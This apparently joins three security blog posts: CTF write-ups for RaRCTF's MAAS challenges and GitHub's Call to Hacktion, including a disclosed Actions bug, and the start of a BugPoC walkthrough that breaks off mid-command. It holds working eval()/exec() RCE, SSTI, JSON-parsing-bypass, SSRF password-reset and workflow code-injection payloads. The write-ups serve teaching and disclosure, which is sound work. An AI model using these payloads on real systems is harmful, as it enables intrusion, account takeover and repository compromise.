It’s been a while since I last played in any CTF, and somehow I ended up playing in 3 concurrent CTFs last weekend – BSides Noida CTF, Defcon Cloud Village CTF, and RaRCTF. In all, I worked on and solved ~15 challenges! :exploding_head:

Here’s a summary of the CTF results:

It was a great team effort in achieving such results :)

In this writeup, I will focus solely on the Microservices As A Service (MAAS) challenge from RaRCTF.

Introduction

Microservices As A Service (MAAS) is designed to be a 3-part challenge, but 2 additional parts were added during the competition to (somewhat) address the unintended solutions. Since there is an official writeup, I will only discuss the intended solutions and alternative solutions here.

MAAS consists of 3 microservices – Calculator, Notes, and Manager. The mapping of challenges to microservices is as follows:

  • MAAS 1 - Calculator
  • MAAS 2 - Notes
  • MAAS 2.5 - Notes (Fix for MAAS 2)
  • MAAS 3 - Manager
  • MAAS 3.5 - Manager (Fix for MAAS 3)

MAAS 1 - Calculator

Let’s jump straight to the source code for the calculator microservice:

@app.route('/arithmetic', methods=["POST"])
def arithmetic():
    if request.form.get('add'):
        r = requests.get(f'http://arithmetic:3000/add?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('sub'):
        r = requests.get(f'http://arithmetic:3000/sub?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('div'):
        r = requests.get(f'http://arithmetic:3000/div?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('mul'):
        r = requests.get(f'http://arithmetic:3000/mul?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    result = r.json()
    res = result.get('result')
    if not res:
        return str(result.get('error'))
    try:
        res_type = type(eval(res, builtins.__dict__, {}))
        if res_type is int or res_type is float:
            return str(res)
        else:
            return "Result is not a number"
    except NameError:
        return "Result is invalid"

Clearly, having user-controlled input reach eval() allows execution of arbitrary code and leaking of the flag. The /add endpoint simply returns the concatenation of the n1 and n2 parameters as strings, allowing us to pass user-controlled input to eval().

If we want to leak the flag directly, we could replace the res local variable with the flag so that when the microservice returns the result to the frontend app, we are able to see the flag. However, notice that for the eval(), globals were restricted to builtins.__dict__, and we cannot access local variables either.

With access to builtins, we can import arbitrary Python modules using __import__("package_name") and read arbitrary files using open("filename", "r").read(). This allows for a blind exfiltration of the flag, either using a boolean-based (e.g. comparison) or time-based (e.g. using time.sleep()) technique.
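To illustrate this (a minimal local sketch, not the challenge code): with builtins.__dict__ supplied as the globals for eval(), built-in functions remain reachable, but names from the surrounding scope are not.

import builtins

# Stand-in for open('/flag.txt').read(): builtins such as __import__ and open
# are still reachable because builtins.__dict__ is used as the globals mapping.
print(eval("__import__('os').listdir('/')", builtins.__dict__, {}))

# Names from the calling scope, however, are not visible inside the eval():
secret = "unreachable"
try:
    eval("secret", builtins.__dict__, {})
except NameError as err:
    print("local/global variables are not accessible:", err)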

A time-based blind exfiltration of the flag can be performed by ensuring that the following string is passed to eval():

exec('''
sleep = __import__("time").sleep
flag = open("/flag.txt", "r").read()
current_char = flag[0] # replace index accordingly
sleep(ord(current_char))
''')

Alternatively, you can use a comparison-based method, as in the reference solution, to leak the flag one character at a time:

1 if open('/flag.txt', 'r').read()[0] == 'r' else None

But such blind exfiltration techniques are pretty slow and sometimes unreliable, so let’s just leak the entire flag directly. One possible way to do so is to add an @app.after_request handler to the microservice, intercepting the response and inserting the flag into it.

Here’s an example of how we would have written the code if we were to implement such a handler in the application directly:

@app.after_request
def after_request_func(response):
    if b"res must contain this secret sentence to get flag :)" in response.data:
        response.data = open("/flag.txt","r").read()
    return response

Since we do not have access to global variables, we need to obtain a reference of the app somehow. We can easily get a reference to the current Flask app via flask.current_app.

Putting everything together, this was the payload I used to get the flag. The /add endpoint concatenates n1 and n2 into [1337,exec('...')][0], which evaluates to the integer 1337 and therefore passes the type check, while the exec() call registers the after_request hook as a side effect:

n1:
[1337,exec('app = __import__("flask").current_app\n@app.after_request\ndef after_request_func(response):\n    if b"res must contain this secret sentence to get flag :)" in response.data:\n        response.data = open("/flag.txt","r").read()\n    return response')]

n2:
[0]
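For reference, here is a rough sketch of delivering the payload with Python requests. The URL is a placeholder – in the live challenge the form fields are submitted through the public app frontend, which relays them to the calculator’s /arithmetic route:

import requests

# Hypothetical URL -- in the live challenge the form is submitted through the
# public app frontend rather than to the calculator directly.
URL = "http://challenge-host/arithmetic"

# Raw string: the \n sequences stay literal and only become real newlines when
# eval() parses the inner '...' string literal handed to exec().
n1 = r"""[1337,exec('app = __import__("flask").current_app\n@app.after_request\ndef after_request_func(response):\n    if b"res must contain this secret sentence to get flag :)" in response.data:\n        response.data = open("/flag.txt","r").read()\n    return response')]"""
n2 = "[0]"
data = {"add": "1", "n1": n1, "n2": n2}

# 'add' routes to the concatenating /add endpoint, so eval() receives
# "[1337,exec('...')][0]" -- an int result that passes the type check.
requests.post(URL, data=data)           # registers the after_request hook

# The echoed result string contains the secret sentence, so the hook should
# now swap the response body for the flag.
print(requests.post(URL, data=data).text)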

Flag: rarctf{0v3rk1ll_4s_4_s3rv1c3_3fca0faa}

MAAS 2 - Notes

Below is the relevant vulnerable code for the notes backend microservice:

@app.route('/useraction', methods=["POST"])
def useraction():
    mode = request.form.get("mode")
    username = request.form.get("username")
    if mode == "register":
    ...
    elif mode == "bioadd":
        bio = request.form.get("bio")
        bio.replace(".", "").replace("_", "").\
            replace("{", "").replace("}", "").\
            replace("(", "").replace(")", "").\
            replace("|", "")

        bio = re.sub(r'\[\[([^\[\]]+)\]\]', r'', bio)
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        requests.post(f"http://redis_userdata:5000/bio/{port}", json={
            "bio": bio
        })
        return ""
    elif mode == "bioget":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        r = requests.get(f"http://redis_userdata:5000/bio/{port}")
        return r.text
    ...

@app.route("/render", methods=["POST"])
def render_bio():
    data = request.json.get('data')
    if data is None:
        data = {}
    return render_template_string(request.json.get('bio'), data=data)

Here, we can see that there’s a server-side template injection (SSTI) vulnerability in /render, where we can render the bio of a user. However, we cannot reach this endpoint directly – we can only access it through the frontend application, which calls /useraction with the bioget mode to fetch the user’s bio and then renders it via /render.

Interestingly, the denylist implementation in bioadd mode is flawed:

bio = request.form.get("bio")
bio.replace(".", "").replace("_", "").\
    replace("{", "").replace("}", "").\
    replace("(", "").replace(")", "").\
    replace("|", "")

Notice that the resulting string after replacing the banned characters is never assigned back to bio. This means that we can use any SSTI payload directly to achieve RCE/arbitrary file read and leak the flag!

To get the flag, we can simply register a user and then update the user’s bio with the following SSTI payload:

{{ _.__eq__.__func__.__globals__.__builtins__.open('/flag.txt').read() }}

Flag: rarctf{wh4t_w4s_1_th1nk1ng..._60a4ee96}

MAAS 2.5 - Notes (Fixed)

Of course, the above solution was an unintended one. The fix was to assign the resulting replacement string back to the bio variable.

I actually solved MAAS 2 with the intended solution for MAAS 2.5 before realising the mistake in the bioadd implementation. :man_facepalming:

The only redeeming factor was that I got a first blood :drop_of_blood: on this challenge! :rofl:

My solution for this fixed challenge matches the reference solution – use the Redis migration to override the port stored for our user to ../bio/, which lets us control the server-side request path and place the SSTI payload in the bio when adding a new key after the migration.

Flag: rarctf{.replace()_1s_n0t_1n_pl4c3...e8d54d13}

MAAS 3 - Manager

Below is the relevant vulnerable code for the app frontend:

@app.route("/manager/update", methods=["POST"])
def manager_update():
    schema = {"type": "object",
              "properties": {
                  "id": {
                      "type": "number",
                      "minimum": int(session['managerid'])
                  },
                  "password": {
                      "type": "string",
                      "minLength": 10
                  }
              }}
    try:
        jsonschema.validate(request.json, schema)
    except jsonschema.exceptions.ValidationError:
        return jsonify({"error": f"Invalid data provided"})
    return jsonify(requests.post("http://manager:5000/update",
                                 data=request.get_data()).json())

The manager backend microservice then relays the JSON data to a Golang backend service.

@app.route("/update", methods=["POST"])
def update():
    return jsonify(requests.post("http://manager_updater:8080/",
                                 data=request.get_data()).json())

It can be seen that request.get_data() (i.e. the raw request body), rather than request.json (i.e. the parsed JSON object), is passed on to the Golang backend service. If you have read BishopFox Labs’ article on JSON interoperability vulnerabilities, you will recognise that this can easily introduce inconsistencies in JSON parsing, which leads to unintended behaviour in application flows. When Flask parses the request body as JSON, duplicated keys are ignored and only the last value is kept in the resulting object. The Golang backend service, however, uses buger/jsonparser, which returns the first value instead.
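As a quick local illustration of the Flask-side half of this mismatch (the Go side behaves as described above and is not reproduced here):

import json

body = '{"id":0,"id":2,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}'

# Python's json module (which Flask uses under the hood) keeps the last
# occurrence of a duplicated key...
print(json.loads(body)["id"])   # -> 2

# ...whereas buger/jsonparser on the Go side stops at the first "id" match
# and returns 0, as described above.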

If our manager ID is 2, we can send a POST request to /manager/update with the following request body:

{"id":0,"id":2,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}

This bypasses the frontend validation: Flask keeps only the last id value (2), which satisfies the minimum. The Golang backend service, however, reads the first id value (0) and updates the password for manager ID 0 instead!

As a result, we can simply log in as admin with the password we set above to obtain the flag.
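Here is a rough sketch of delivering that body with Python requests – the host is a placeholder, and we assume we are already logged in as manager ID 2 with a valid session cookie:

import requests

# The duplicate "id" key only survives if we send a raw string body -- a
# Python dict passed via json= would collapse it before it ever leaves us.
body = '{"id":0,"id":2,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}'

r = requests.post(
    "http://challenge-host:5000/manager/update",        # hypothetical host
    data=body,
    headers={"Content-Type": "application/json"},
    cookies={"session": "<manager 2 session cookie>"},  # placeholder
)
print(r.text)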

Flag: rarctf{rfc8259_15_4_b1t_v4gu3_1a97a3d3}

MAAS 3.5 - Manager (Fixed)

Naturally, the above solution was the intended solution, so copy-pasting the same solution from above works for MAAS 3.5.

Sadly, this challenge was pretty much broken even after the fixed version was released. They simply shifted the JSON validation checks from the app frontend to the manager backend service, but that didn’t fully prevent unintended solutions either.

So what went wrong? Well, looking at the docker-compose.yml file provided, it can be observed that network segregation is not done correctly:

version: "3.3"
services:
  app:
    build: app
    ports:
      - "5000:5000"
    depends_on: ["calculator", "notes", "manager"]
    networks:
      - public
      - level-1

  calculator:
    build: calculator
    depends_on: ["checkers", "arithmetic"]
    networks:
      - level-1
      - calculator-net
  checkers:
    build: calculator/checkers
    networks:
      - calculator-net
  arithmetic:
    build: calculator/arithmetic
    networks:
      - calculator-net

  notes:
    build: notes
    depends_on: ["redis_users", "redis_userdata"]
    networks:
      - level-1
      - notes-net
  redis_users:
    image: library/redis:latest
    networks:
      - notes-net
  redis_userdata:
    build: notes/redis_userdata
    networks:
      - notes-net

  manager:
    build: manager
    depends_on: ["manager_users", "manager_updater"]
    networks:
      - level-1
      - manager-net
  manager_users:
    image: library/redis:latest
    networks:
      - manager-net
  manager_updater:
    build: manager/updater
    networks:
      - level-1
      - manager-net

networks:
    public:
        driver: bridge
    level-1:
        driver: bridge
        internal: true
    calculator-net:
        driver: bridge
        internal: true
    notes-net:
      driver: bridge
      internal: true
    manager-net:
      driver: bridge
      internal: true

Notice that the manager_updater Golang service is in both the manager-net and level-1 networks. Since calculator and notes are also in the level-1 network, we can leverage the arbitrary code execution in the calculator microservice or the SSTI in the notes microservice to perform SSRF, allowing us to update the admin account’s password via the manager_updater Golang service.

This unintended solution works even with the fixed version of manager, so you didn’t need to know about JSON interoperability vulnerabilities and could still solve it anyway. :joy:

We can simply use the eval() RCE in the calculator microservice to change the admin password, and then log in as admin with the password we set to obtain the flag:

[1337,exec('''__import__("requests").post("http://manager_updater:8080/",data='{"id":0,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}')''')][0]

Flag: rarctf{k33p_n3tw0rks_1s0l4t3d_lol_ef2b8ddc}

The GitHub Capture-the-Flag - Call to Hacktion concluded in March 2021, and I was pleasantly surprised to be the first person to complete the challenge! I was intending to do a short writeup on the challenge back then, but the official writeup by GitHub had already explained the vulnerabilities and the solution.

There were some parts which I did not fully understand even after solving the challenge, and I want to take this chance to revisit some of the missed steps. I will also discuss a bug I chanced upon while performing this deep-dive analysis. Hopefully this article provides deeper insights into the internals of GitHub Actions, explains the whole exploit chain in detail, and raises awareness about the dangers of logging untrusted inputs in GitHub Actions.

Introduction

Call to Hacktion is a CTF hosted by GitHub Security Lab that ran from 17 March 2021 to 21 March 2021. The challenge is to exploit a vulnerable GitHub Actions workflow in a player-instanced private repository. Contestants are given read-only access to the repository, and the goal is to exploit the vulnerable workflow to overwrite README.md on the main branch to prove that the contestant had successfully obtained write privileges to the repository (i.e. read-only access -> privilege escalation -> read-write access).

Vulnerable Workflow Analysis

Without further ado, let’s jump straight into the vulnerable workflow (.github/workflows/comment-logger.yml) in the player-instanced challenge repository:

name: log and process issue comments
on:
  issue_comment:
    types: [created]

jobs:
  issue_comment:
    name: log issue comment
    runs-on: ubuntu-latest
    steps:
      - id: comment_log
        name: log issue comment
        uses: actions/github-script@v3
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
          COMMENT_ID: ${{ github.event.comment.id }}
        with:
          github-token: "deadc0de"
          script: |
            console.log(process.env.COMMENT_BODY)
            return process.env.COMMENT_ID
          result-encoding: string
      - id: comment_process
        name: process comment
        uses: actions/github-script@v3
        timeout-minutes: 1
        if: ${{ steps.comment_log.outputs.COMMENT_ID }}
        with:
          script: |
            const id = ${{ steps.comment_log.outputs.COMMENT_ID }}
            return ""
          result-encoding: string

If you have been following GitHub Security Lab’s research articles, you may have come across this article by Jaroslav Lobacevski on code/command injection in workflows. Essentially, it is not recommended to reference potentially untrusted input via GitHub Actions expression syntax in inline scripts, as this can easily lead to code/command injection. In the comment_process step, the line const id = ${{ steps.comment_log.outputs.COMMENT_ID }} uses a GitHub Actions expression referencing an output from a previous job step directly within the inline script. This looks suspicious, and code injection may be possible if the expression value can be controlled by an adversary.

Let’s move on to examine the referenced job step (comment_log) and determine how code injection could be achieved:

- id: comment_log
  name: log issue comment
  uses: actions/github-script@v3
  env:
    COMMENT_BODY: ${{ github.event.comment.body }}           // attacker-controlled data
    COMMENT_ID: ${{ github.event.comment.id }}               // safe numerical ID generated by GitHub
  with:
    github-token: "deadc0de"
    script: |
      console.log(process.env.COMMENT_BODY)                  // untrusted input logged to standard output!
      return process.env.COMMENT_ID                          // safe value returned
    result-encoding: string
- id: comment_process
  name: process comment
  uses: actions/github-script@v3
  timeout-minutes: 1
  if: ${{ steps.comment_log.outputs.COMMENT_ID }}            // if this output is set from previous job
  with:
    script: |
      const id = ${{ steps.comment_log.outputs.COMMENT_ID }} // fill output value here!
      return ""
    result-encoding: string

Here, the actions/github-script@v3 action is being used. This action accepts a script argument passed via with: in the workflow file and executes it, giving easy access to the GitHub API and the workflow run context. Notice that the comment body – attacker-controlled data – is logged to standard output in the inline script! Through a feature of GitHub Actions known as workflow commands, an action can interact with the Actions runner: the runner parses the output of each execution step and handles any command denoted by an output line starting with :: after trimming leading whitespace.

This means that when an output line such as ::set-output name=[name]::[value] is logged, the output value becomes accessible via ${{ steps.[step_id].outputs.[name] }}. In the vulnerable workflow above, an adversary can therefore set ${{ steps.comment_log.outputs.COMMENT_ID }} to a value that leads to code injection in the comment_process step.
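As a minimal illustration of the mechanism (Python is used here purely as a stand-in for any program running in a step, and some_step/greeting are made-up names): printing the set-output workflow command – since deprecated, but supported at the time of the challenge – to standard output is enough to populate a step output.

# If this runs inside a step with id "some_step", a later step can read the
# value via ${{ steps.some_step.outputs.greeting }} -- the runner treats any
# stdout line beginning with "::" (after trimming whitespace) as a command.
print("::set-output name=greeting::hello")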

To solve the challenge, we first complete the const id = assignment with 1; and then inject JavaScript that uses the pre-authenticated octokit/core.js client to push a new commit overwriting README.md via the GitHub REST API. I ended up with the following solution:

::set-output name=COMMENT_ID::1; console.log(context); console.log(process); await github.request('PUT /repos/{owner}/{repo}/contents/{path}', { owner: 'incrediblysecureinc', repo: 'incredibly-secure-Creastery', path: 'README.md', message: 'Escalated to Read-write Access', content: Buffer.from('Pwned!').toString('base64'), sha: '959c46eb0fbab9ab5b5bfb279ab6d70f720d1207' })

Note: console.log(context); console.log(process); is added purely for debugging and is not actually required to exploit the vulnerable workflow. 959c46eb0fbab9ab5b5bfb279ab6d70f720d1207 refers to the SHA for the git blob (README.md) being updated.

Why Did the Exploit Work?

Now, we have successfully exploited the vulnerable workflow and solved the challenge. But we have yet to understand why it worked under the hood.

Let’s continue by enabling debug logging in the Actions runner. To do so, follow the steps in the documentation and set the following repository secrets:

  • ACTIONS_RUNNER_DEBUG to true
  • ACTIONS_STEP_DEBUG to true

Since participants were given read-only access to the repository, it is not possible to set the secrets in the player-instanced repository. I proceeded to create a private test repository, added the debug repository secrets and imported the vulnerable workflow file.

After supplying a test comment, the workflow runs successfully with the following log:

...
##[debug]Starting: log issue comment
##[debug]Loading inputs
##[debug]Loading env
##[group]Run actions/github-script@v3
with:
  github-token: deadc0de
  script: console.log(process.env.COMMENT_BODY)
  return process.env.COMMENT_ID
  result-encoding: string
  debug: false
  user-agent: actions/github-script
env:
  COMMENT_BODY: Test
  COMMENT_ID: 802762169
##[endgroup]
test
::set-output name=result::802762169
##[debug]steps.comment_log.outputs.result='802762169'
##[debug]Node Action run completed with exit code 0
##[debug]Finishing: log issue comment
...

It turns out that return process.env.COMMENT_ID does not set ${{ steps.comment_log.outputs.COMMENT_ID }} after all! In fact, the comment_process step references a supposedly non-existent output of the comment_log step.

However, we do see ${{ steps.comment_log.outputs.result }} being set. Upon examining the source code of actions/github-script@v3, it is clear why this is the case:

...
const result = await callAsyncFunction(
  {require: require, github, context, core, io},
  script
)

...

core.setOutput('result', output)
...

What Could Go Wrong With Logging Untrusted Inputs? :see_no_evil:

One interesting thought I had: what if the workflow relied on outputs.result instead? Is the modified workflow below vulnerable?

...
    uses: actions/github-script@v3
    script: |
      console.log(process.env.COMMENT_BODY)
      return process.env.COMMENT_ID
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

The answer is no – if the set-output workflow command is executed multiple times for the same output name, only the last value is retained.

Notice that in the above workflow, a trailing newline is implicitly appended by console.log(). Because of that newline, the legitimate ::set-output name=result::... command issued afterwards for the return value always starts on a fresh line, gets parsed as a command, and overrides whatever the attacker injected.
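As a rough Python analogue of the distinction that everything below hinges on – print() appends a trailing newline just like console.log(), while sys.stdout.write() does not, mirroring process.stdout.write():

import sys

print("ends with a newline, like console.log()")
sys.stdout.write("no newline appended, like process.stdout.write()")
sys.stdout.write(" -- anything written next lands on the same line\n")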

Now, let’s consider a similar workflow that instead logs untrusted input using process.stdout.write(). Is this vulnerable?

...
    uses: actions/github-script@v3
    script: |
      process.stdout.write(process.env.COMMENT_BODY)         // no trailing newline here
      return process.env.COMMENT_ID                          // does this overwrite existing ::set-output?
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

This is a tricky question. I was not sure either, but it turns out this workflow is actually vulnerable!

But why? The Actions runner reads each line of the step output, then parses and executes any workflow command it detects (lines starting with the :: marker). In the above workflow, the output from process.stdout.write(process.env.COMMENT_BODY) is concatenated with the output from core.setOutput('result', output), which is triggered under the hood by the return statement in the inline script.

In other words, if the following comment body is supplied:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
JUNK

Note: There is no trailing newline after JUNK.

The output shown in the job execution logs is:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
##[debug]steps.comment_log.outputs.result='1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);'
JUNK::set-output name=result::802762169
##[debug]Node Action run completed with exit code 0
...
This should not be executed -- proof that we indeed have code injection: 1337

Observe that the ::set-output workflow command issued for the script’s return value does not enforce a leading newline before being concatenated with the logged untrusted input. This means we can prevent the return statement from successfully setting the result step output by clobbering its ::set-output command with the untrusted input.

Examining the source code for @actions/core, we can see why this happens:

export function issueCommand(
  command: string,
  properties: CommandProperties,
  message: any
): void {
  const cmd = new Command(command, properties, message)
  process.stdout.write(cmd.toString() + os.EOL) // leading newline not guaranteed
}

As a result of the missing prepended newline, users who mistakenly trust the output of ${{ steps.*.outputs.result }} set by @actions/github-script through @actions/core may end up working with an untrusted value in subsequent job execution steps, which may lead to remote code/command execution and privilege escalation in seemingly secure workflows.

This issue was reported to GitHub via HackerOne and was resolved through an interim fix that prepends a newline when the command is issued by core.setOutput():

  • @actions/core v1.2.7 [PR]
  • actions/github-script v4.0.2 [PR]

Admittedly, while the interim solution is necessary, it is far from perfect, as workflows/actions using core.setOutput() under the hood may now produce a lot of unnecessary newlines in the job execution logs. In the future, this issue may be properly addressed with the complete removal of standard output command processing:

“To address the wider risks you bring up more holistically, we’re planning on removing stdout comand processing altogether in favor of a true CLI interface you’d need to explicitly choose to invoke to perform workflow commands. So long as info written to stdout can influence the runtime of an action, it’s no longer safe to print untrusted data to logs (and that’s certainly not a reasonable expectation to set for users of Actions). We may make some of this behavior more strict in the meantime, but long term we’re planning on tearing it out.”

Disclosure Timeline

  • March 23, 2021 – Reported to GitHub Bug Bounty program on HackerOne
  • March 24, 2021 – GitHub – Initial acknowledgement of report
  • April 12, 2021 – Enquired on the status of the report
  • April 12, 2021 – GitHub – Provided update that their engineering teams are still working on triaging this issue
  • April 17, 2021 – GitHub – Asked to review the pull request on @actions/toolkit to implement the interim fix prior to removal of standard output processing of set-output, and informed about long term plan to remove support for standard output processing
  • April 18, 2021 – Verified that the interim fix in @actions/core is correct, but noted that the dependency of actions/github-script was not updated accordingly. Agreed that deprecating standard output command processing is a good move to eliminate such unexpected vulnerabilities caused by logging untrusted inputs.
  • June 19, 2021 – GitHub – Resolved report and awarded bounty

Conclusion

In the past, there have been security concerns over workflow commands being parsed and executed by the Actions runner, leading to unexpected modification of environment variables / path injection and resulting in remote code/command execution in workflows. To mitigate such risks, the GitHub team decided to deprecate several workflow commands. It is strongly recommended to disable workflow command processing before logging any untrusted input to avoid unexpected behaviour!

Thanks to GitHub Security Lab team for creating this awesome challenge and for the bounty! Taking part in this challenge helped immensely in solidifying my understanding of GitHub Actions and security considerations one should make when creating workflows.

Recently, BugPoC teamed up with @NahamSec and announced on Twitter a memory leak challenge sponsored by Amazon. The vulnerabilities presented in the challenge are rather realistic. In fact, I have encountered similar vulnerabilities a couple of times while bug hunting on web applications! Besides presenting a walkthrough of the challenge in this write-up, I will also discuss alternative solutions and include some tips as well. Do read on if you are interested! :smile:

Introduction

The goal of the challenge is to find an insecurely stored Python variable called SECRET_API_KEY somewhere on the server – http://doggo.buggywebsite.com.

Let’s start by finding out more information about the challenge site provided.

$ dig doggo.buggywebsite.com +short any
doggo.buggywebsite.com.s3-website-us-west-2.amazonaws.com

It seems to be an Amazon S3 website. If the S3 bucket is misconfigured, we could possibly discover new information stored in the bucket, or even mess around with its files. You can use a tool such as BucketScanner by @Rzepsky to check for common S3 bucket misconfigurations. Unfortunately, this bucket is not misconfigured, so let’s go back to the challenge site itself.

Visiting the challenge site at http://doggo.buggywebsite.com/, we can see a few images of dogs. Let’s examine the JavaScript file loaded (script.js) to better understand how the images are fetched dynamically:

const API_ENDPOINT = "https://doggo-api.buggywebsite.com";

async function getURLs(pageNum){
  var PARAMS = {
    1: "gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==",
    2: "gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==",
    3: "gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==",
    4: "gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ=="
  };
  var param = PARAMS[pageNum];
  var endpoint = API_ENDPOINT + '/get-dogs';

  let response = await fetch(endpoint, {
    headers: {
      'x-param': param,
      'x-fingerprint': localStorage.fingerprint,
    }
  });
  let data = await response.json()
  return data['body'];

}

function addImages(urls){
  var div = document.getElementById('images-div');
  div.innerHTML = '';
  for (var i = 0; i < urls.length; i++){
    var img = document.createElement('img');
    img.setAttribute('class', 'pretty-img');
    img.setAttribute('src', urls[i]);
    div.appendChild(img)
    div.appendChild(document.createElement('br'))
  }
}

function loadPage(pageNum){
  document.querySelector('#theLoader').style.display='inline';
  var buttons = document.getElementsByClassName('page-button');
  for (var i = 0; i < buttons.length; i++){
    buttons[i].disabled = false;
  }
  getURLs(pageNum).then(urls => {
    addImages(JSON.parse(urls));
    document.getElementById('button-'+pageNum).disabled = true;
    document.querySelector('#theLoader').style.display='none';
  })
}

async function setFingerprint(){
  if (localStorage.fingerprint == undefined) {
    document.querySelector('#theLoader').style.display='inline';
    var endpoint = API_ENDPOINT + '/fingerprint';
    let response = await fetch(endpoint);
    let data = await response.json()
    localStorage.fingerprint = data['fingerprint'];
  }
}

function initPage(){
  setFingerprint().then(_ => {
    loadPage(1);
  })
}

It seems that there is an API server at https://doggo-api.buggywebsite.com. This API server should be the actual target, since the goal is to achieve some form of memory leakage, which we can’t really achieve on http://doggo.buggywebsite.com (a static website hosted in an S3 bucket).

Also, two endpoints can be observed from the JavaScript code, namely:

  • /get-dogs – an endpoint accepting an encrypted x-param header value and loading different pages of dogs
  • /fingerprint – an endpoint used to obtain some value for fingerprinting the current user

You may have also noticed that there are four Base-64 encoded strings starting with gAAAAAB. Decoding them yields binary data, indicating that the values may have been encrypted prior to being encoded. A quick search on this prefix reveals that these are most likely Fernet tokens – Fernet being a symmetric encryption scheme commonly used in Python applications.
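As a quick sanity check of that hunch (a local sketch using the cryptography package, not anything server-side): Fernet tokens always share this prefix, since the first byte is the version 0x80 followed by a big-endian timestamp.

from cryptography.fernet import Fernet

key = Fernet.generate_key()        # urlsafe-base64-encoded 32-byte key
f = Fernet(key)

token = f.encrypt(b'{"UA": "TEST"}')
print(token[:10])                  # b'gAAAAAB...' -- same prefix as the strings above
print(f.decrypt(token))            # b'{"UA": "TEST"}'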

Since we do not know the secret key used to create the ciphertexts, we cannot decrypt them ourselves. There aren’t any relevant known weaknesses in Fernet that would allow us to encrypt/decrypt arbitrary text either, so let’s keep this information in mind and move on to examine the other information we just gathered.

/get-dogs Endpoint

Tracing the JavaScript code, we can see that whenever a page is requested, a fingerprint value is first obtained from /fingerprint, followed by a request to the /get-dogs endpoint with the respective Base-64 encoded ciphertext to retrieve the list of images to load.

Let’s try to replicate this behaviour to better understand the application flow. We start by obtaining a valid fingerprint value:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Then, we attempt to request the dog images for all four Base-64 encoded strings we discovered earlier on.

$ echo 'gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==' > 1.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 1.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=1", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog1.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog2.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog3.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog4.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog5.jpg\"]"}

$ echo 'gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==' > 2.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 2.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=2", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog6.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog7.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog8.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog9.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog10.jpg\"]"}

$ echo 'gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==' > 3.b64
